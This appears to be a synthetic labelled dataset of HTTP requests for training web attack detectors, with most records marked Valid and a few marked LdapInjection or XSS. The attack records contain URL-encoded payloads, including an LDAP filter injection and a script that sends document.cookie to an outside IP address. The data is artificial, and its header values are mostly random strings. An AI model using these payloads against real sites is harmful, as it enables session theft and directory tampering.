Referer: http://dneaPr.biz/besxt/arajwhit/trr5feot/deoitlrt/eydmh.cgi
TE: gzip;q=0.8
Trailer: Authorization
User-Agent: Mozilla/1.2 (compatible; MSIE 9.1; Win98; nnmerh; rhauoaoewl)
UA-CPU: StrongARM
UA-Disp: 8005,879,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/9.2 98.202.222.16, 0.6 182.84.33.203, 7.6 www.mcohttt.jpeg
Transfer-Encoding: deflate
Upgrade: ieot/7.9
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 55629847157981677810
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19872
Start - Id: 7501
class: Valid
PUT /necgfkrTssetao/btaGOykGOOzNU/t54niazLdkitly6heojn/gSDC/it9rgixseTbldkue3tl1/o1errtseB7et.gif? HTTP/1.1
Content-Length: 217
Content-Language: 5efar,7u,k6e
Content-Encoding: compress
Content-Location: http://www.6ears.cz/6sCenuCf/0etsiota.jsp
Content-MD5: dHRwYmVsVDllaW8ycG9ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Jun 05 08:57:29 UTC
Last-Modified: Sun, 13 Nov 05 17:13:43 CET
Host: www.aecwm7.biz
Connection: keep-alive
Accept: image/gif, image/gif;q=0.2, application/*
Accept-Charset: iso-8859-5, big5;q=0.8, cp-936;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 161.58.198.141
Cookie: wl3be=bsa8
Cookie2: $Version="4"
Date: Sun, 30 Dec 07 01:12:26 CET
ETag: "v0ubEkLpwiK67fAc"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Tue, 05 Oct 04 13:39:22 GMT
If-Unmodified-Since: Sat, 27 Dec 08 18:19:12 CET
If-Match: *
If-None-Match: *
If-Range: "997PL8tmy6FEiWUqL"
Max-Forwards: 7320
MIME-Version: 7.9
Pragma: h='no'
Proxy-Authorization: Digest nc=ae0bFDd6
Authorization: Basic bm90dDpmZHhlNmVt
Range: -8172
Referer: http://nWOswfcs.st/hoti/OsiShs.zip
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/1.8 (X11; U; Solaris 2.0; bS-nL; rv:6.6.2) Gecko/15064548
UA-CPU: MIPS
UA-Disp: 4017,6215,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 065x199
Via: 4.3 234.213.232.62, 8.1 www.eis2.shtml
Transfer-Encoding: deflate
Upgrade: oolip/0.3, ahu8/5.0, 3gs/3.9, bivgut/4.8
Warning: 710 www.0nr9ps.tiff "rhdtOmautr8t" 
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 3073722375
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

aHouixoi=wl>bch thp&oioint=andh n+si?&knwanptononn7lr=3707979&g8agl7h=ogotqhdtdFehas&irsg=estr1&yl9gfstOat3nST=3673726522&cJI.y=nrysl&qnLieax=mxaqehonnrpositioned=cdfE&dsBYvHLHqkA4=zei&erem86gy2mismah=cdcerni9

End - Id: 7501
Start - Id: 28238
class: Valid
GET /ea/vo1i/psHoO6tmn0s/qfsRR/5a/HVAASO1q/yr6/rtweetaoU58arhueyt/tltdt/rrmdi8iuam34nH9aeid/iheitttszsAaie1orti/ohtoeteea.php4?j8nidtto=fuips&twoeIra=saawwJuDNjhs&Hctemslottredv6=oa&nooaro1u5oXeatt=8665803&td=+a1t HTTP/1.1
Host: 196.81.174.153
Connection: eetIrnI
Accept: application/rtf;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ehe6f-ge, rahAzd0a-4d, eEt-Ijp6oie
Cache-Control: no-cache
Client-ip: 55.74.248.128
Cookie: iCms5hsh=enSqvqWdf;rful=4299706;nlxOh=O|oyeA$n1;ttrptLrf=4qc-V1OM;s5dTor=aubO0t;bOldQA4tXdnC6s=0F8ntOl0blyhofoksd
Cookie2: $Version="9"
Date: Sat, 22 May 04 19:31:06 UTC
ETag: W/"Nm.iuX8suDD9c7Ce9AU9"
Expect: enhdid=dfro;egrabn
From: e7ne1tE@sl9o.st
If-Modified-Since: Sat, 17 Apr 10 06:52:41 GMT
If-Unmodified-Since: Thu, 30 Dec 04 02:13:15 GMT
If-Match: "q9vTg39SlHTK@ws"
If-None-Match: *
If-Range: Sun, 12 Apr 09 03:46:30 UTC
Max-Forwards: 88
MIME-Version: 3.4
Pragma: tu2='ehytw2u'
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: edyzcr btqx5=ilhdoy
Range: 560912-
Referer: http://ittet.uk/yno0iyi/i0btrli.php3
TE: gzip,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/9.8 (X11; U; Solaris 9.2; ee-ko; rv:4.0.9) Gecko/70436303
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: 6.5 www.Trlbsefq.tiff, 6.7 www.tdsoc.png
Transfer-Encoding: deflate
Upgrade: uOiar/2.7, NgZ73n/8.2, sDhb/6.3, oeA/4.9
Warning: 924 www.i9iai.jpg "n67aimtnoeOah" "Wed, 07 Sep 05 06:35:32 GMT"
X-Forwarded-For: 178.243.220.136
X-Serial-Number: 144317661774202
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28238
Start - Id: 5303
class: Valid
POST /_NFfMAcOwMq/miapLefkcay/89/vshntnetRI46gc3et9/auaOx2ioe/Q1-Nfj@MAMo8Z/Nz/ninrziaeaiis2he/topheErtNstukegkr4/aee7kuSaglrdfSnCe.htm? HTTP/1.0
Content-Length: 127
Content-Language: 8Zhdnfi
Content-Encoding: identity
Content-Location: /abdn.png
Content-MD5: TXM4cml1eEVnd3RpbzFrYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Apr 05 22:12:13 GMT
Last-Modified: Wed, 10 May 06 05:48:24 GMT
Host: 207.114.163.72
Connection: yol7uryg
Accept: */*;q=0.3
Accept-Charset: iso-8859-4;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 32.242.144.60
Cookie: TAtelnetovwq.I9=lDx0.;uflw=varxp_=s;MaL5stdinbetweenu=nGTvU9
Cookie2: $Version="0"
Date: Sun, 18 Mar 07 16:16:24 GMT
ETag: "NFTGQ1TBxgd8RxUJl6"
Expect: enfl
From: naRoHav2@prVrEyldam.com
If-Modified-Since: Wed, 12 Oct 05 06:22:14 CET
If-Unmodified-Since: Fri, 30 Apr 04 08:04:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 10 13:33:32 GMT
Max-Forwards: 42
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest username="tsbhdh"
Authorization: Basic ZTA5aGx5Omxmc3J4bg==
Range: 8822-34,539805-
Referer: http://idrdshi.gov/epe8gtk6/et8ohoro/Hexs/egTer.swf
TE: trailers
Trailer: If-None-Match
User-Agent: Naemrr/6.0.4
UA-CPU: 68000
UA-Disp: 370,737,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1146x7241
Via: FTP/0.8 137.197.99.113:681, 7.1 www.scrl.jpeg, 4.6 108.116.178.155
Transfer-Encoding: identity
Upgrade: s6e/1.2, nTe/7.0, nedeCt/2.1
Warning: 218 43.28.61.59 "ovEe0ysqedar" "Wed, 21 Apr 10 15:43:26 GMT"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aechtrm=10&aetaatks=nlopen&oyrihbbsslnnc=349&uoletite62e=<[ltinsert&pe=ccDgus4&00hdums9amo8=ee3qdAcXvIa&aheDrttk=iasnhr6tcT

End - Id: 5303
Start - Id: 37867
class: LdapInjection
GET /cr/aU/1se3/9s3smwPtatw/rh1etooe/aasdb1IJ_W/jEt/atTgdqhdertsiiinrhp/EVm/FUe/mB4U_Lx.wnGv@/uulR.sh?rocttmzsdAs=%241fhjetde7cp&tdnc4th=40917423&p.C2J1systemlO=8441887&Rrbi6pu6=3ld%29%28%26%28objectClass+++%3D+weo*%29&bosbsid=aer%7C&2r3sfpn=p&bYsdr4=iQHfnTP1F&UTb4iDeeqntiHi=rZrEgPdG&xioormtfstara=%26cta&csock_streamwQqZLa=5870073&snxIrttalicbS=hceeeqreceMab&NwUVPIN75ktelnet=093&rvanpsmLndRyodi=2 HTTP/1.0
Host: www.sIebii.ch:4603
Connection: rcoCa
Accept: video/*;q=0.9, application/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: fEae-l;q=0.8, seqfN-o9oeu;q=0.4, srres3-3wh
Cache-Control: min-fresh=36864
Client-ip: 22.110.9.101
Cookie: htpassRzZftp-iD=p1ApvWn;0hnYcttsnite=ebo
Cookie2: $Version="68"
Date: Thu, 11 Mar 04 08:38:33 CET
ETag: W/"2FKzg9Sm9Ylt2ij82H"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Sat, 17 Oct 09 05:57:23 UTC
If-Match: "ZCcjF3mjaH5DPP0fpZa"
If-None-Match: "cP6fnYiatwSIYB2Qot@"
If-Range: *
Max-Forwards: 086
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: vcyoe XEolGpxu=defga
Range: 1-,245-14,-1105
Referer: /stdjNc/eFetMl/fhedtn/rekR5e/nsmei.conf
TE: gzip;q=0.4,deflate;q=0.3
Trailer: Max-Forwards
User-Agent: rX6.V@bSR_ http://www.68piiob.net
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: gzip
Upgrade: obeThi/2.4, ems/4.7
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 223.104.48.29
X-Serial-Number: 300384
----: --------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37867
Start - Id: 32427
class: Valid
GET /iE/lkFieAhnaohic/Si7ltl/0ft/aHbc_updateU2/9Ol0cApSxua/vrTpcGif_8uuhiO.jpeg?eerSp8d=88363192&b5keMlat=5807&CcQOBR9g-f=fwnwn&N4cA2icwp-GB=l-dX&we4neni9hihent=miVrw%40h_j&olab8gpmddgs=oVbt28FmBYm7&eeyqaja=6350102562 HTTP/1.0
Host: 249.39.227.210
Connection: aihsajO
Accept: application/x-tar;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.4, identity, gzip
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 219.214.20.65
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="25"
Date: Sun, 04 Apr 10 08:32:02 GMT
ETag: "tqC@JMKR_PyTjEEXyEls"
Expect: 100-continue
From: releg@syoCrleekk.net
If-Modified-Since: Sun, 25 Jun 06 18:16:49 GMT
If-Unmodified-Since: Wed, 17 Nov 04 09:57:44 UTC
If-Match: "G.uMWinvcUWd5Yi"
If-None-Match: "A2p@G-VB4Catm.WOg@"
If-Range: "fRDabHJh99jAX8a0NGR"
Max-Forwards: 93
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: riast tqseqm6g=ayomhio
Authorization: rncNtu dEeXetVe=tfoN0e4a
Range: -559,9543-
Referer: http://www.a5e9.it/id2mt/iisa/niihHva/etteshm.ace
TE: deflate,gzip;q=0.8
Trailer: From
User-Agent: Mozilla/8.0 (X11; U; Solaris 4.5; d4-1u; rv:1.5.8) Gecko/88274636
UA-CPU: MIPS
UA-Disp: 2929,115,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: 5.7 126.8.181.4, 3.5 189.97.136.109, 9.3 113.207.114.208
Transfer-Encoding: deflate
Upgrade: lnn/5.1, Waou/6.2, a6h/3.5
Warning: 635 www.g4Aean.shtml:356 "6nfv" "Tue, 13 Mar 07 11:19:31 UTC"
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32427
Start - Id: 2054
class: Valid
GET /itwnunyoqHls/iDqP_@-/d5_pA1nUdNX0zUrV/oInPrhLBqM6/ybPY_fLncJI/uoe3dsxeeaiu.aspx?ae=54068&sRwsnnoiatsso=796939&7artbo=87573&iesX=55319&.X-IFSeJ-=-osw3&wihgttgBe=%3EUte&pKYnlW=totr+rdategs+oeow+&bhenniakTdstr=ny%26e&dhomeT9tk=o%5Cs++opt&8Is1pQd2=pnetcat&ntNzuaeIatmords=497&eeffIUtsai=homeeftpdt&teintd=ehwwxtu+cai HTTP/1.0
Host: 56.54.216.223
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: max-stale=38
Client-ip: 64.153.22.113
Cookie: bxfVVY1.R=yr
Cookie2: $Version="04"
Date: Tue, 02 Nov 04 11:20:13 CET
ETag: W/"GLaVKJDPh9s.8RfsKOeT"
Expect: bBrnhtq=onncro
From: occ0efi@8ll4r48z.be
If-Modified-Since: Fri, 01 Dec 06 04:27:30 GMT
If-Unmodified-Since: Sun, 08 Nov 09 24:40:53 CET
If-Match: "Elezp37pLEvUoG7uiRI"
If-None-Match: *
If-Range: Fri, 01 Apr 05 07:45:54 GMT
Max-Forwards: 8
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Digest realm
Range: -586766,7072-,732551-
Referer: /nzehicgo/Ag2d/roee/aOuweaa/Ieress.sh
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.4 (Windows; U; Win98 1.1; oo-bN; rv:2.2.6) Gecko/72773268
UA-CPU: PowerPC
UA-Disp: 0185,510,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 008x3318
Via: 2.6 36.102.140.188:187
Transfer-Encoding: identity
Upgrade: tte/8.2, sonwnA/0.6, ahSlN/5.2, n8na/0.0, Temy/5.6
Warning: 517 www.ga29eer.tiff "dl7koePensh3m" "Mon, 01 Aug 05 08:22:34 UTC"
X-Forwarded-For: 18.100.221.44
X-Serial-Number: 82872435333808
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2054
Start - Id: 47656
class: XSS
GET /ud8Ap7Kmn/t3NKiUrmAZkKU9Q1.tiff?wgoldnLaninhl=%3Cstyle++type%3D++%22+++text%2Fjavascript++++%22++++%3E%5Bwindow.open%28%27http%3A%2F%2F169.64.135.91%2Fng.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle++%3E&SzWUPAb=+ng&uhmSdneb1eaap=wtsamti5 HTTP/1.0
Host: 110.65.8.175
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, iso-8859-1;q=0.7, x-mac-arabic
Accept-Encoding: *;q=0.5
Accept-Language: to-aoc, eiata-ui
Cache-Control: max-age=0
Client-ip: 56.155.32.167
Cookie: swes=lsu
Cookie2: $Version="8"
Date: Sun, 05 Apr 09 04:47:30 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: varybo=Gdejuu9m;vcuie=deknnr
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: http://ssmt.it/ip8si6/Ulkne/1pny.php3
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 6.1; 65-t2; rv:5.3.1) Gecko/67777357
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 101x052
Via: 4.9 23.1.222.104
Transfer-Encoding: es9es
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47656
Start - Id: 48034
class: XSS
GET /lho/eo4surosjv/ehQN/tTM2gA/ckR9C@/eKKVwi.png?ercwershrhess=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Balert+++%28%27moieexe1r%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&oCUzZbJvw=scb_BBTquJc%40&o6=oimgroup+by+E+%5Dlu1M&ghguPemticaslyn=ositle%3ClacheT&dein=ue2&e8arreet=l&giNE7R=mIau&8iaqseif=qnm%27oeahhhdeleteshutdown&5ewasj5z=%27xwnafj HTTP/1.1
Host: 221.149.144.28:80
Connection: keep-alive
Accept: image/jpeg;q=0.9
Accept-Charset: windows-874, windows-1253, windows-1252, iso-10646-ucs-2;q=0.4
Accept-Encoding: deflate;q=0.6, deflate;q=0.1
Accept-Language: eq-t6ssz;q=0.3, let1m3-ertgl, z-lMalr1r;q=0.1, 3ihNh-aEhmsw;q=0.0, apc-yAnaonst
Cache-Control: no-transform
Client-ip: 195.17.8.114
Cookie: evasyeemoy=~at;mo4hqhbovea=tb;ge4izn=an9et;uxtsuEsro=tl;lunienir67=i;tmnecu=teOxIdassAoetrd
Cookie2: $Version="85"
Date: Sun, 17 Jul 05 22:05:08 CET
ETag: "RXIPZOoD.fV7rkbkIP4"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 26 Aug 05 16:51:16 CET
If-Unmodified-Since: Tue, 05 Dec 06 18:02:22 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jan 09 07:48:38 CET
Max-Forwards: 509
MIME-Version: 4.1
Pragma: crmrhia='dzNt'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: NTLM aEQ2dDh0bm9hZDNNN2xzcnN5ZWhwbGRsYm90ZXRvaWpndHROSVlhdGluVGRy
Range: -605,08388-217,461352-2
Referer: http://eTaty.it/etntDC.msf
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: loMwdtltexyOscnn8yvz
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: 1.7 71.35.142.28, 9tlea/8.8 www.fluilt.tiff
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48034
Start - Id: 19152
class: Valid
GET /etOdbeLtatfesiea/AIxp_RLnodeconnectnullN.php3?oSRg=kn0nriwnnapsnt&eskeenhbeo=bZmochaRlattlaccess_log+rjr%5Co&GOstdinB@catDs=1973713647&0vtUNtlvDuE=80474 HTTP/1.1
Host: www.esaR2t08u.net
Connection: close
Accept: text/*, audio/x-wav;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip, identity;q=0.6
Accept-Language: *
Cache-Control: oxhsh='yu'
Client-ip: 40.88.186.196
Cookie: xeoeEcgGaoti=323971;k7BuqC=ie6n;Hridi0Le=3777;htd=196709;tdury=le+etseid;1laal= k0fIaEi(
Cookie2: $Version="746"
Date: Sat, 31 Jan 04 15:40:49 CET
ETag: W/"eKP35ifDThMvjLc-p"
Expect: 100-continue
From: wgnl@sel6ocu.cz
If-Modified-Since: Wed, 30 Dec 09 05:14:53 CET
If-Unmodified-Since: Fri, 13 Aug 04 03:32:21 CET
If-Match: *
If-None-Match: *
If-Range: "H3VOUp7cnBqy8T9PT3Lo"
Max-Forwards: 8
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: oxea t9llrjyt=m7moteDl
Range: -26751,992963-79665,-06526
Referer: http://lld3il.uk/eaure.jsp
TE: gzip
Trailer: Transfer-Encoding
User-Agent: 4sgxeeen/8.3.2
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: 3.0 www.etiy6ne.html, FTP/9.8 www.Soe0o.shtml, FTP/5.5 67.78.81.203
Transfer-Encoding: m32az; anfaaagl=w2reUl
Upgrade: oiv/4.6, cunS0/6.8, iten/9.5, sszmK/2.3, i5od/3.4
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19152
Start - Id: 25098
class: Valid
GET /rnhcbotoE/l2sHJk-eW5fvRNq@E/7Hz/ra/av.php?tahrtetnn=bqhi&Trtie=g2RwC_CGqZs&eet=%3E&o4er=871&daeeVejsle=7101 HTTP/1.1
Host: www.isei.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, gzip;q=0.2
Accept-Language: *;q=0.0
Cache-Control: max-stale=37
Client-ip: 140.38.232.179
Cookie: C_O1ArAX9J=TtseoohdEltmrnbad;nnhwc=b
Cookie2: $Version="98"
Date: Sat, 22 May 04 07:47:17 GMT
ETag: "buE3l-3D03kvNOAJTC"
Expect: 100-continue
From: hixb@siilehs.org
If-Modified-Since: Tue, 29 Jul 08 14:49:23 UTC
If-Unmodified-Since: Sat, 21 Mar 09 02:52:07 GMT
If-Match: *
If-None-Match: "@i@vtXa-jk_YwwSoq"
If-Range: "VuFHMZJXQVMAUmCgGwm"
Max-Forwards: 7441
MIME-Version: 9.2
Pragma: elxr='1'
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: Digest response="b05fCEaD2af7fadCA3edb1D9CDEE1dF4"
Range: 07094-
Referer: http://kaitoS.it/3ndernm/eernlqe/v7ic.nsf
TE: trailers,chunked,chunked
Trailer: Expect
User-Agent: 2imtrTys/1.3.6.8.4
UA-CPU: PowerPC
UA-Disp: 0466,0106,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 131x6281
Via: FTP/1.2 141.157.126.4:4798, HTTP/4.7 246.19.32.90, 1.3 27.156.244.55
Transfer-Encoding: ai5lr
Upgrade: yg2S1h/0.5, 6io/2.3, dsn/3.4
Warning: 642 253.124.12.232 "tnzgoO" "Wed, 21 Apr 04 07:49:37 UTC"
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25098
Start - Id: 20863
class: Valid
GET /eC.P0DzTx.8xbQ6iN/tQApfmD_s2n@sblh/axpse3oheOuransumb/dbetndru3nceaets/PxySshutdownJ0nSNIg./esaItilyi.mdb?s9ueeyooth=630217&rrd5ucqv=A&orttsehto8itn9=907738&ZuvcR6=380&eutrBryltnMqa=87&fwlenlhde=edocument%25&hBF0WZadmin=0657&det=%2Be6tmtchvar++arI7ep HTTP/1.0
Host: 15.246.66.75
Connection: keep-alive
Accept: application/*, audio/basic;q=0.9, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lidn-ap, henhfEe-adhmt
Cache-Control: no-cache
Client-ip: 187.205.214.190
Cookie: 1eulkf=hsAchc13riay>Qt;ohhM3cbrnijm=y1tssawinnt;nnQasE8rup9m=827501
Cookie2: $Version="06"
Date: Wed, 03 Mar 10 14:31:36 UTC
ETag: "BnbYQ5mwr2P6C.zMiP@"
Expect: ef4mTus
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Sun, 04 Jul 04 10:58:56 UTC
If-Unmodified-Since: Tue, 19 Jan 10 16:03:22 GMT
If-Match: "RrRakNRuemAIkYJW.B9e"
If-None-Match: "4NO7YCKcnNebz0JX"
If-Range: Fri, 26 Jun 09 03:09:22 CET
Max-Forwards: 9294
MIME-Version: 8.4
Pragma: laj=eh
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest response="EEfbCFf0BDfEeFa08e8c8c4e04Cdd3fd"
Range: -77,606877-66602,300395-
Referer: http://ade9o.net/j9oe/srutcnd/dnutsp/liroo/uzglAt7u.rar
TE: trailers,deflate;q=0.7
Trailer: Referer
User-Agent: snronheEi/7.4
UA-CPU: StrongARM
UA-Disp: 550,7756,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0585x0395
Via: 5.9 229.91.155.143, 8.4 www.ocIH.htm
Transfer-Encoding: compress
Upgrade: 8If/0.9, 7ae/0.3
Warning: 073 108.42.143.143:6055 "e6wijdilnehoadd" "Tue, 10 Apr 07 08:34:49 UTC"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20863
Start - Id: 16833
class: Valid
GET /nZ0ss77lr@QXuWfbT/sfOEFThHRl.tiff?ehZ3speytty=%7Einoptxohsystem1afu&uemr=309831&t2te5nfweR1m=944140&@ccat86BvC26M=Aa&3acsb4luw=64&hqnonoflea=92551817&piSTyh9hnzs=oNfvt HTTP/1.0
Host: www.qpwh.be:3775
Connection: keep-alive
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aeZtn-Ntct9zE, aOne-idHeabsR;q=0.1
Cache-Control: min-fresh=5640
Client-ip: 151.96.44.149
Cookie: pv0VGzC=%ot;mthshd4l=icor2rndhnn;esreoEo1ha=u~gs;agtebdiygdfnei=2019
Cookie2: $Version="34"
Date: Mon, 26 Jun 06 03:30:35 GMT
ETag: W/"kUkqN1NTy0RhvodVIgS"
Expect: Rrelwyaa=lCese;lbrSM
From: sLreap3i@a64Yedt.be
If-Modified-Since: Fri, 25 Feb 05 10:34:35 GMT
If-Unmodified-Since: Tue, 07 Feb 06 10:11:27 CET
If-Match: *
If-None-Match: "Rv9RXRDpttAjaUwk"
If-Range: *
Max-Forwards: 723
MIME-Version: 6.7
Pragma: neTnM=lo
Proxy-Authorization: NTLM YWZBYWFvam9nZmUxazVlM2VhYXMwZWVpc3NzZWhJemVsdElmb3NlaHlOeWdk
Authorization: Basic c2hpQWJ0bjpFc2VzaVY=
Range: 9-87181
Referer: /luei/ehedie.wav
TE: deflate;q=0.5,trailers,gzip;q=0.9
Trailer: If-Range
User-Agent: otvtpti
UA-CPU: Sparc
UA-Disp: 952,004,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 818x5345
Via: FTP/6.0 241.131.247.186:6, 1.7 3.83.247.99, 4.6 164.113.67.250
Transfer-Encoding: gzip
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 045 www.on6iee.shtml "rinmaEtgssGotet" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16833
Start - Id: 24614
class: Valid
GET /iEiL_oK87ZE3KsM.H/4DKDX/H8GKSalocationjtJGX.K/q6ffjbxk/WNqKEGnO74ZuPSf/wmhetepeewroe/nh6th550arraopan04a/L2TFH0qdocument/iS96fnSKpK/nnLlAaqrsN/vOVEDrG8/@g7Gf.cgi? HTTP/1.1
Host: 100.1.169.255:80
Connection: mtewtLo
Accept: */*;q=0.9
Accept-Charset: iso-8859-7
Accept-Encoding: identity
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 230.12.170.135
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="701"
Date: Sat, 21 Oct 06 02:25:31 GMT
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: yee4hf
From: tgmyAbC@mwndiie.gov
If-Modified-Since: Mon, 30 Jun 08 19:16:48 UTC
If-Unmodified-Since: Thu, 17 Nov 05 24:21:24 CET
If-Match: "c9STw.Av98HooMsqS"
If-None-Match: "9fbSaB2vh2zWIOQ"
If-Range: "jeU07g7qrP1RSbSr"
Max-Forwards: 43
MIME-Version: 1.4
Pragma: 2nawr0='ufde4Fo6'
Proxy-Authorization: R9lOil aedc=l6achff
Authorization: Digest qop=auth-int
Range: -633614,846-,145-
Referer: /qtgd/esia/bhrlcsoi/3g6Evg2e/Chok36lL.asmx
TE: gzip;q=0.0,gzip
Trailer: Host
User-Agent: nsaYe/8.6.5.1.8
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: iij/9.4 www.sirx.htm, HTTP/0.0 www.Bmnb.js, FTP/1.5 www.recsi.jpg
Transfer-Encoding: rhip; rwaenPy9=lnaothe
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
